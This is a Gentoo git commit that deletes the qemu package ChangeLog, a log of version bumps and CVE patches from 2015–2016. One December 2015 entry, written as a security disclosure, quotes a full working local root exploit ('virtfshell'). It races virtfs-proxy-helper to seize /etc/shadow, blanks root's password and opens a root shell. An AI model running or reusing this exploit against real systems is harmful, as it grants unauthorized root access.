app-emulation/qemu: sync qemu-2.7.0-r7

Nick Owens 2016-11-29 13:15:25 -08:00
parent a0ac1b44ac
commit 5cd9f4489b
32 changed files with 1111 additions and 2338 deletions


@ -1,792 +0,0 @@
# ChangeLog for app-emulation/qemu
# Copyright 1999-2016 Gentoo Foundation; Distributed under the GPL v2
# (auto-generated from git log)
*qemu-9999 (09 Aug 2015)
*qemu-2.3.0-r5 (09 Aug 2015)
*qemu-2.3.0-r4 (09 Aug 2015)
09 Aug 2015; Robin H. Johnson <robbat2@gentoo.org> +files/65-kvm.rules,
+files/bridge.conf, +files/qemu-1.7.0-cflags.patch,
+files/qemu-2.2.1-CVE-2015-1779-1.patch,
+files/qemu-2.2.1-CVE-2015-1779-2.patch,
+files/qemu-2.3.0-CVE-2015-3209.patch,
+files/qemu-2.3.0-CVE-2015-3214.patch,
+files/qemu-2.3.0-CVE-2015-3456.patch,
+files/qemu-2.3.0-CVE-2015-5154-1.patch,
+files/qemu-2.3.0-CVE-2015-5154-2.patch,
+files/qemu-2.3.0-CVE-2015-5154-3.patch,
+files/qemu-2.3.0-CVE-2015-5158.patch,
+files/qemu-2.3.0-CVE-2015-5165-1.patch,
+files/qemu-2.3.0-CVE-2015-5165-2.patch,
+files/qemu-2.3.0-CVE-2015-5165-3.patch,
+files/qemu-2.3.0-CVE-2015-5165-4.patch,
+files/qemu-2.3.0-CVE-2015-5165-5.patch,
+files/qemu-2.3.0-CVE-2015-5165-6.patch,
+files/qemu-2.3.0-CVE-2015-5165-7.patch,
+files/qemu-2.3.0-CVE-2015-5166.patch, +files/qemu-binfmt.initd-r1,
+metadata.xml, +qemu-2.3.0-r4.ebuild, +qemu-2.3.0-r5.ebuild,
+qemu-9999.ebuild:
proj/gentoo: Initial commit
This commit represents a new era for Gentoo:
Storing the gentoo-x86 tree in Git, as converted from CVS.
This commit is the start of the NEW history.
Any historical data is intended to be grafted onto this point.
Creation process:
1. Take final CVS checkout snapshot
2. Remove ALL ChangeLog* files
3. Transform all Manifests to thin
4. Remove empty Manifests
5. Convert all stale $Header$/$Id$ CVS keywords to non-expanded Git $Id$
5.1. Do not touch files with -kb/-ko keyword flags.
Signed-off-by: Robin H. Johnson <robbat2@gentoo.org>
X-Thanks: Alec Warner <antarus@gentoo.org> - did the GSoC 2006 migration
tests
X-Thanks: Robin H. Johnson <robbat2@gentoo.org> - infra guy, herding this
project
X-Thanks: Nguyen Thai Ngoc Duy <pclouds@gentoo.org> - Former Gentoo
developer, wrote Git features for the migration
X-Thanks: Brian Harring <ferringb@gentoo.org> - wrote much python to improve
cvs2svn
X-Thanks: Rich Freeman <rich0@gentoo.org> - validation scripts
X-Thanks: Patrick Lauer <patrick@gentoo.org> - Gentoo dev, running new 2014
work in migration
X-Thanks: Michał Górny <mgorny@gentoo.org> - scripts, QA, nagging
X-Thanks: All of other Gentoo developers - many ideas and lots of paint on
the bikeshed
*qemu-2.3.0-r6 (10 Aug 2015)
10 Aug 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.3.0-virtio-serial.patch, +qemu-2.3.0-r6.ebuild:
qemu: fix from upstream for virtio-serial security issue #557206
10 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r6.ebuild:
qemu: do not put directly into stable
*qemu-2.3.1 (12 Aug 2015)
12 Aug 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.3.1.ebuild:
qemu: version bump to 2.3.1
*qemu-2.4.0 (12 Aug 2015)
12 Aug 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.4.0.ebuild:
qemu: version bump to 2.4.0
14 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.4.0.ebuild,
qemu-9999.ebuild:
depend on libepoxy for USE=opengl #557488
14 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.4.0.ebuild,
qemu-9999.ebuild:
move more deps to softmmu-only case
These packages are only used when building softmmu binaries, so don't try
pulling them in when the user is building tools or user binaries.
14 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r4.ebuild,
qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild,
qemu-2.4.0.ebuild, qemu-9999.ebuild:
switch to virtual/libusb to quiet repoman
Now that the virtual requires the latest libusb, we can switch to that
rather than depending directly on libusb's version.
16 Aug 2015; Justin Lecher <jlec@gentoo.org> metadata.xml,
qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild,
qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild:
Use slot operators for ncurses
Package-Manager: portage-2.2.20.1
Signed-off-by: Justin Lecher <jlec@gentoo.org>
24 Aug 2015; Justin Lecher <jlec@gentoo.org> metadata.xml,
qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild,
qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild:
Use https by default
Convert all URLs for sites supporting encrypted connections from http to
https
Signed-off-by: Justin Lecher <jlec@gentoo.org>
24 Aug 2015; Mike Gilbert <floppym@gentoo.org> metadata.xml:
Revert DOCTYPE SYSTEM https changes in metadata.xml
repoman does not yet accept the https version.
This partially reverts eaaface92ee81f30a6ac66fe7acbcc42c00dc450.
Bug: https://bugs.gentoo.org/552720
26 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r4.ebuild,
qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild,
qemu-2.4.0.ebuild, qemu-9999.ebuild:
sys-libs/ncurses: move to SLOT=0 #557472
Use SLOT=0 for installing of main development files like other packages
so we can use other SLOTs for installing SONAME libs for binary packages.
28 Aug 2015; Manuel Rüger <mrueg@gentoo.org> -qemu-2.3.0-r4.ebuild:
Remove vulnerable
Package-Manager: portage-2.2.20.1
07 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
add new targets
07 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
update seabios pin to version 1.8.2
07 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
add target sanity checks
This way we know up front when a new target appears rather than when
someone happens to check & notice.
*qemu-2.4.0-r1 (07 Sep 2015)
07 Sep 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.0-CVE-2015-5225.patch,
+files/qemu-2.4.0-block-mirror-crash.patch,
+files/qemu-2.4.0-e1000-loop.patch, -qemu-2.4.0.ebuild,
+qemu-2.4.0-r1.ebuild:
various fixes/updates
Sync in the updates from the 9999 ebuild:
- updated seabios pin
- add new targets
- add sanity checks for targets
Add fix from upstream for blockcommit crashes #558396.
Add fix from upstream for CVE-2015-5225 #558416.
Add fix posted upstream (but not yet merged) for e1000 infinite loop
#559656.
08 Sep 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.0-r1.ebuild:
amd64 stable wrt bug #558416
Package-Manager: portage-2.2.20.1
RepoMan-Options: --include-arches="amd64"
08 Sep 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.0-r1.ebuild:
x86 stable wrt bug #558416
Package-Manager: portage-2.2.20.1
RepoMan-Options: --include-arches="x86"
11 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.4.0-r1.ebuild,
qemu-9999.ebuild:
require mesa[egl] too
Upstream commit 7ced9e9f6da2257224591b91727cfeee4f3977fb made the egl
layer of mesa a requirement.
16 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
switch USE=tls to USE=gnutls #560574
Upstream no longer has dedicated configuration options for tls settings.
Instead, it's all run through the gnutls feature test.
We require newer versions of gnutls because supporting older ones gets a
bit messy -- qemu might leverage libgcrypt or nettle depending on how the
gnutls package was built. By forcing the latest version, we can simplify
and only require nettle. This isn't a big deal as it's already stable.
26 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
add tilegx linux-user target #561322
29 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
update smartcard configure flag #561670
*qemu-2.4.0.1 (10 Oct 2015)
10 Oct 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.0-CVE-2015-6855.patch,
+files/qemu-2.4.0-CVE-2015-7295-1.patch,
+files/qemu-2.4.0-CVE-2015-7295-2.patch,
+files/qemu-2.4.0-CVE-2015-7295-3.patch, +qemu-2.4.0.1.ebuild:
version bump to 2.4.0.1 #562594
This also includes security fixes for #560760 #560550 #560422.
*qemu-2.4.0.1-r1 (15 Oct 2015)
15 Oct 2015; Markos Chandras <hwoarang@gentoo.org>
+files/qemu-2.4-mips-fix-mtc0.patch, +files/qemu-2.4-mips-fix-rdhwr.patch,
+files/qemu-2.4-mips-move-interrupts-new-func.patch,
+files/qemu-2.4-mips-wake-up-on-irq.patch, +qemu-2.4.0.1-r1.ebuild:
Backport a few MIPS patches. Bug #563162
Package-Manager: portage-2.2.23
26 Oct 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
update qmp doc paths #564186
*qemu-2.4.1 (06 Nov 2015)
06 Nov 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.4.1.ebuild:
version bump to 2.4.1 #564990
07 Nov 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-9999.ebuild:
force C locale for sorting to workaround glibc bug #564936
23 Nov 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-cflags.patch, qemu-9999.ebuild:
update cflags patch #565866
07 Dec 2015; Doug Goldstein <cardoe@gentoo.org> qemu-2.3.0-r5.ebuild,
qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-9999.ebuild:
utilize xen-tools sub-slot
app-emulation/xen-tools now exposes a sub-slot to help dependencies
rebuild when necessary.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
*qemu-2.4.1-r1 (08 Dec 2015)
08 Dec 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.1-CVE-2015-7504.patch,
+files/qemu-2.4.1-CVE-2015-7512.patch,
+files/qemu-2.4.1-CVE-2015-8345.patch, +qemu-2.4.1-r1.ebuild:
add upstream security fixes #566792 #567144
08 Dec 2015; Mike Frysinger <vapier@gentoo.org> metadata.xml,
qemu-9999.ebuild:
add USE=virgl for Virgil 3d GPU #566994
08 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
switch to new libcacard release #561814
*qemu-2.4.0.1-r2 (14 Dec 2015)
*qemu-2.4.0-r2 (14 Dec 2015)
*qemu-2.3.1-r1 (14 Dec 2015)
*qemu-2.3.0-r7 (14 Dec 2015)
14 Dec 2015; Jason A. Donenfeld <zx2c4@gentoo.org> +qemu-2.3.0-r7.ebuild,
+qemu-2.3.1-r1.ebuild, +qemu-2.4.0-r2.ebuild, +qemu-2.4.0.1-r2.ebuild:
critical security fix
The virtfs-proxy-helper program is not a safe binary to give caps.
The following exploit code demonstrates the vulnerability:
~=~=~=~= snip ~=~=~=~=
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Beginning race loop
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper",
"-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock",
NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow >
/tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
15 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r5.ebuild,
qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-2.4.1-r1.ebuild, qemu-9999.ebuild:
drop virtfs-proxy-helper fcaps from all versions #568226
*qemu-2.4.1-r2 (15 Dec 2015)
15 Dec 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.1-CVE-2015-7549.patch,
+files/qemu-2.4.1-CVE-2015-8504.patch, +qemu-2.4.1-r2.ebuild:
add upstream fixes for #567828 #568214
16 Dec 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.1-r2.ebuild:
amd64 stable wrt bug #567828
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
16 Dec 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.1-r2.ebuild:
x86 stable wrt bug #567828
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
*qemu-2.5.0 (17 Dec 2015)
17 Dec 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.5.0.ebuild:
version bump to 2.5.0
17 Dec 2015; Mike Frysinger <vapier@gentoo.org>
-files/qemu-2.2.1-CVE-2015-1779-1.patch,
-files/qemu-2.2.1-CVE-2015-1779-2.patch,
-files/qemu-2.3.0-CVE-2015-3209.patch,
-files/qemu-2.3.0-CVE-2015-3214.patch,
-files/qemu-2.3.0-CVE-2015-3456.patch,
-files/qemu-2.3.0-CVE-2015-5154-1.patch,
-files/qemu-2.3.0-CVE-2015-5154-2.patch,
-files/qemu-2.3.0-CVE-2015-5154-3.patch,
-files/qemu-2.3.0-CVE-2015-5158.patch,
-files/qemu-2.3.0-CVE-2015-5165-1.patch,
-files/qemu-2.3.0-CVE-2015-5165-2.patch,
-files/qemu-2.3.0-CVE-2015-5165-3.patch,
-files/qemu-2.3.0-CVE-2015-5165-4.patch,
-files/qemu-2.3.0-CVE-2015-5165-5.patch,
-files/qemu-2.3.0-CVE-2015-5165-6.patch,
-files/qemu-2.3.0-CVE-2015-5165-7.patch,
-files/qemu-2.3.0-CVE-2015-5166.patch,
-files/qemu-2.3.0-virtio-serial.patch,
-files/qemu-2.4.0-CVE-2015-5225.patch,
-files/qemu-2.4.0-CVE-2015-6855.patch,
-files/qemu-2.4.0-CVE-2015-7295-1.patch,
-files/qemu-2.4.0-CVE-2015-7295-2.patch,
-files/qemu-2.4.0-CVE-2015-7295-3.patch,
-files/qemu-2.4.0-block-mirror-crash.patch,
-files/qemu-2.4.0-e1000-loop.patch, -qemu-2.3.0-r5.ebuild,
-qemu-2.3.0-r6.ebuild, -qemu-2.3.0-r7.ebuild, -qemu-2.3.1.ebuild,
-qemu-2.3.1-r1.ebuild, -qemu-2.4.0-r1.ebuild, -qemu-2.4.0-r2.ebuild,
-qemu-2.4.0.1.ebuild, -qemu-2.4.0.1-r1.ebuild, -qemu-2.4.0.1-r2.ebuild,
-qemu-2.4.1.ebuild, -qemu-2.4.1-r1.ebuild:
drop versions <2.4.1-r2
20 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0.ebuild,
qemu-9999.ebuild:
disable libgcrypt usage #568856
*qemu-2.5.0-r1 (18 Jan 2016)
18 Jan 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-CVE-2015-8558.patch,
+files/qemu-2.5.0-CVE-2015-8567.patch,
+files/qemu-2.5.0-CVE-2015-8701.patch,
+files/qemu-2.5.0-CVE-2015-8743.patch,
+files/qemu-2.5.0-CVE-2016-1568.patch, +qemu-2.5.0-r1.ebuild:
add upstream fixes for #567868 #568246 #570110 #570988 #571566
24 Jan 2016; Michał Górny <mgorny@gentoo.org> metadata.xml:
Replace all herds with appropriate projects (GLEP 67)
Replace all uses of herd with appropriate project maintainers, or no
maintainers in case of herds requested to be disbanded.
24 Jan 2016; Michał Górny <mgorny@gentoo.org> metadata.xml:
Set appropriate maintainer types in metadata.xml (GLEP 67)
26 Jan 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r1.ebuild:
amd64 stable wrt bug #571566
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
26 Jan 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r1.ebuild:
x86 stable wrt bug #571566
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
15 Feb 2016; Doug Goldstein <cardoe@gentoo.org>
-files/qemu-1.7.0-cflags.patch, -files/qemu-2.4-mips-fix-mtc0.patch,
-files/qemu-2.4-mips-fix-rdhwr.patch,
-files/qemu-2.4-mips-move-interrupts-new-func.patch,
-files/qemu-2.4-mips-wake-up-on-irq.patch,
-files/qemu-2.4.1-CVE-2015-7504.patch,
-files/qemu-2.4.1-CVE-2015-7512.patch,
-files/qemu-2.4.1-CVE-2015-7549.patch,
-files/qemu-2.4.1-CVE-2015-8345.patch,
-files/qemu-2.4.1-CVE-2015-8504.patch, -qemu-2.4.1-r2.ebuild,
-qemu-2.5.0.ebuild:
remove vulnerable versions
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
15 Feb 2016; Patrick Lauer <patrick@gentoo.org> metadata.xml:
Remove unneeded useflag description from metadata.xml
Package-Manager: portage-2.2.27
19 Feb 2016; Robin H. Johnson <robbat2@gentoo.org> metadata.xml:
restore USE=gnutls use desc for side-effects
commit ea4d1e1fcc just removed the USE=tls, rather than updating it for
USE=gnutls. Per the description, it has side-effects of enabling
enabling WebSocket & disk quorum features.
Package-Manager: portage-2.2.27
28 Feb 2016; Doug Goldstein <cardoe@gentoo.org> qemu-2.5.0-r1.ebuild:
fix arm64 dependencies
arm/arm64 have some dependencies which are higher than other platforms.
Unfortunately the dependencies are not stable on arm but this package is
so arm updates will come later.
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
28 Feb 2016; Matthew Thode <prometheanfire@gentoo.org> qemu-2.5.0-r1.ebuild:
keywording arm64
merged on X-C1
Package-Manager: portage-2.2.26
15 Mar 2016; Doug Goldstein <cardoe@gentoo.org> qemu-2.5.0-r1.ebuild:
fix arm depends for libseccomp
arm needs libseccomp 2.2.3 or newer for QEMU to be able to utilize it.
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
*qemu-2.5.0-r2 (23 Mar 2016)
23 Mar 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-CVE-2015-8613.patch,
+files/qemu-2.5.0-CVE-2015-8619.patch,
+files/qemu-2.5.0-CVE-2016-1714.patch,
+files/qemu-2.5.0-CVE-2016-1922.patch,
+files/qemu-2.5.0-CVE-2016-1981.patch,
+files/qemu-2.5.0-CVE-2016-2197.patch,
+files/qemu-2.5.0-CVE-2016-2198.patch,
+files/qemu-2.5.0-CVE-2016-2392.patch,
+files/qemu-2.5.0-rng-stack-corrupt-0.patch,
+files/qemu-2.5.0-rng-stack-corrupt-1.patch,
+files/qemu-2.5.0-rng-stack-corrupt-2.patch,
+files/qemu-2.5.0-rng-stack-corrupt-3.patch,
+files/qemu-2.5.0-sysmacros.patch, +files/qemu-2.5.0-usb-ehci-oob.patch,
+files/qemu-2.5.0-usb-ndis-int-overflow.patch, +qemu-2.5.0-r2.ebuild:
backport various upstream fixes
24 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r2.ebuild:
amd64 stable wrt bug #578044
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
24 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r2.ebuild:
x86 stable wrt bug #578044
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
25 Mar 2016; Sergey Popov <pinkbyte@gentoo.org> -qemu-2.5.0-r1.ebuild:
security cleanup
Gentoo-Bug: 576420
Package-Manager: portage-2.2.28
28 Mar 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r2.ebuild,
qemu-9999.ebuild:
use l10n.eclass to respect LINGUAS #577814
*qemu-2.5.0-r3 (28 Mar 2016)
28 Mar 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-9pfs-segfault.patch,
+files/qemu-2.5.0-ne2000-reg-check.patch, +qemu-2.5.0-r3.ebuild:
add few more upstream fixes #573816 #578142
29 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r3.ebuild:
amd64 stable wrt bug #573816
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
29 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r3.ebuild:
x86 stable wrt bug #573816
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
20 Apr 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r3.ebuild,
qemu-9999.ebuild:
mention /dev/kvm perm updates in the readme/elog #580436
*qemu-2.5.1 (23 Apr 2016)
23 Apr 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.1-CVE-2015-8558.patch,
+files/qemu-2.5.1-CVE-2016-4020.patch,
+files/qemu-2.5.1-stellaris_enet-overflow.patch, +qemu-2.5.1.ebuild:
app-misc/qemu: version bump & bug fixes #579614 #580040 #580426
12 May 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.1.ebuild,
qemu-9999.ebuild:
use subslots w/nettle & gnutls #582836
*qemu-2.6.0 (17 May 2016)
17 May 2016; Mike Frysinger <vapier@gentoo.org> +qemu-2.6.0.ebuild,
qemu-9999.ebuild:
version bump to 2.6.0 #583212
17 May 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.1-xfs-linux-headers.patch, qemu-2.5.1.ebuild:
workaround breakage in xfs/linux headers #577810
Add upstream patch to workaround some combinations of xfsprogs & linux
headers so we don't have to worry about stable breakage anymore. This
fix is already in upstream & unstable versions.
18 May 2016; Austin English <wizardedit@gentoo.org>
files/qemu-binfmt.initd-r1:
use #!/sbin/openrc-run instead of #!/sbin/runscript
06 Jun 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r2.ebuild,
qemu-2.5.0-r3.ebuild, qemu-2.5.1.ebuild, qemu-2.6.0.ebuild,
qemu-9999.ebuild:
depend on jpeg SLOT=0 for building
07 Jun 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.6.0-crypto-static.patch, qemu-2.6.0.ebuild, qemu-9999.ebuild:
fix static linking errors w/curl[ssl,curl_ssl_openssl]
21 Jun 2016; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
drop kvm_stat to match upstream #586158
29 Jun 2016; Alexey Shvetsov <alexxy@gentoo.org> qemu-2.5.0-r2.ebuild,
qemu-2.5.0-r3.ebuild, qemu-2.5.1.ebuild, qemu-2.6.0.ebuild,
qemu-9999.ebuild:
adapt sys-infiniband to sys-fabric rename
Package-Manager: portage-2.3.0_rc1
01 Aug 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.1.ebuild,
qemu-2.6.0.ebuild, qemu-9999.ebuild:
handle bzip2 dep #589968
The block layer uses it to support bzip2 compression in dmg images.
That code makes it into softmmu binaries and userland utils.
07 Aug 2016; Luca Barbato <lu_zero@gentoo.org>
+files/qemu-2.6.0-glib-size_t.patch, qemu-2.6.0.ebuild:
Drop a -Werror when it could cause a false positive
The check code could trigger recent compiler warnings.
Package-Manager: portage-2.2.26
15 Aug 2016; Luca Barbato <lu_zero@gentoo.org> files/qemu-binfmt.initd-r1:
Update ppc magic mask
Unbreak using qemu-user with current stage3.
Package-Manager: portage-2.3.0
21 Aug 2016; Luca Barbato <lu_zero@gentoo.org> qemu-9999.ebuild:
Update the languages list
Package-Manager: portage-2.3.0
21 Aug 2016; Luca Barbato <lu_zero@gentoo.org> qemu-9999.ebuild:
Drop a patch
It is already upstreamed.
Package-Manager: portage-2.3.0
05 Sep 2016; Matthias Maier <tamiko@gentoo.org> -qemu-2.5.0-r2.ebuild,
-qemu-2.5.0-r3.ebuild:
remove vulnerable 2.5.0
Package-Manager: portage-2.2.28
*qemu-2.7.0 (05 Sep 2016)
05 Sep 2016; Matthias Maier <tamiko@gentoo.org> +qemu-2.7.0.ebuild:
version bump to 2.7.0, various security fixes
3af9187fc6caaf415ab9c0c6d92c9678f65cb17f -> CVE-2016-4001, bug #579734
3a15cc0e1ee7168db0782133d2607a6bfa422d66 -> CVE-2016-4002, bug #579734
c98c6c105f66f05aa0b7c1d2a4a3f716450907ef -> CVE-2016-4439, bug #583496
6c1fef6b59563cc415f21e03f81539ed4b33ad90 -> CVE-2016-4441, bug #583496
06630554ccbdd25780aa03c3548aaff1eb56dffd -> , bug #583952
844864fbae66935951529408831c2f22367a57b6 -> CVE-2016-5337, bug #584094
b60bdd1f1ee1616b7a9aeeffb4088e1ce2710fb2 -> , bug #584102
1b85898025c4cd95dce673d15e67e60e98e91731 -> , bug #584146
521360267876d3b6518b328051a2e56bca55bef8 -> CVE-2016-4453, bug #584514
4e68a0ee17dad7b8d870df0081d4ab2e079016c2 -> CVE-2016-4454, bug #584514
a6b3167fa0e825aebb5a7cd8b437b6d41584a196 -> CVE-2016-5126, bug #584630
ff589551c8e8e9e95e211b9d8daafb4ed39f1aec -> CVE-2016-5338, bug #584918
d3cdc49138c30be1d3c2f83d18f85d9fdee95f1a -> CVE-2016-5238, bug #584918
1e7aed70144b4673fc26e73062064b6724795e5f -> , bug #589924
afd9096eb1882f23929f5b5c177898ed231bac66 -> CVE-2016-5403, bug #589928
eb700029c7836798046191d62d595363d92c84d4 -> CVE-2016-6835, bug #591244
ead315e43ea0c2ca3491209c6c8db8ce3f2bbe05 -> CVE-2016-6834, bug #591374
6c352ca9b4ee3e1e286ea9e8434bd8e69ac7d0d8 -> CVE-2016-6833, bug #591380
47882fa4975bf0b58dd74474329fdd7154e8f04c -> CVE-2016-6888, bug #591678
805b5d98c649d26fc44d2d7755a97f18e62b438a
56f101ecce0eafd09e2daf1c4eeb1377d6959261
fff39a7ad09da07ef490de05c92c91f22f8002f2 -> , bug #592430
Package-Manager: portage-2.2.28
05 Sep 2016; Matthias Maier <tamiko@gentoo.org>
+files/qemu-2.7.0-CVE-2016-6836.patch, qemu-2.7.0.ebuild:
apply patch for CVE-2016-6836, bug #591242
Package-Manager: portage-2.2.28
05 Sep 2016; Matthias Maier <tamiko@gentoo.org> -qemu-2.6.0.ebuild,
qemu-2.7.0.ebuild:
drop vulnerable 2.6.0
Package-Manager: portage-2.2.28
05 Sep 2016; Matthias Maier <tamiko@gentoo.org>
-files/qemu-2.5.0-9pfs-segfault.patch,
-files/qemu-2.5.0-CVE-2015-8567.patch,
-files/qemu-2.5.0-CVE-2015-8613.patch,
-files/qemu-2.5.0-CVE-2015-8619.patch,
-files/qemu-2.5.0-CVE-2015-8701.patch,
-files/qemu-2.5.0-CVE-2015-8743.patch,
-files/qemu-2.5.0-CVE-2016-1568.patch,
-files/qemu-2.5.0-CVE-2016-1714.patch,
-files/qemu-2.5.0-CVE-2016-1922.patch,
-files/qemu-2.5.0-CVE-2016-1981.patch,
-files/qemu-2.5.0-CVE-2016-2197.patch,
-files/qemu-2.5.0-CVE-2016-2392.patch,
-files/qemu-2.5.0-ne2000-reg-check.patch,
-files/qemu-2.5.0-usb-ehci-oob.patch,
-files/qemu-2.5.0-usb-ndis-int-overflow.patch,
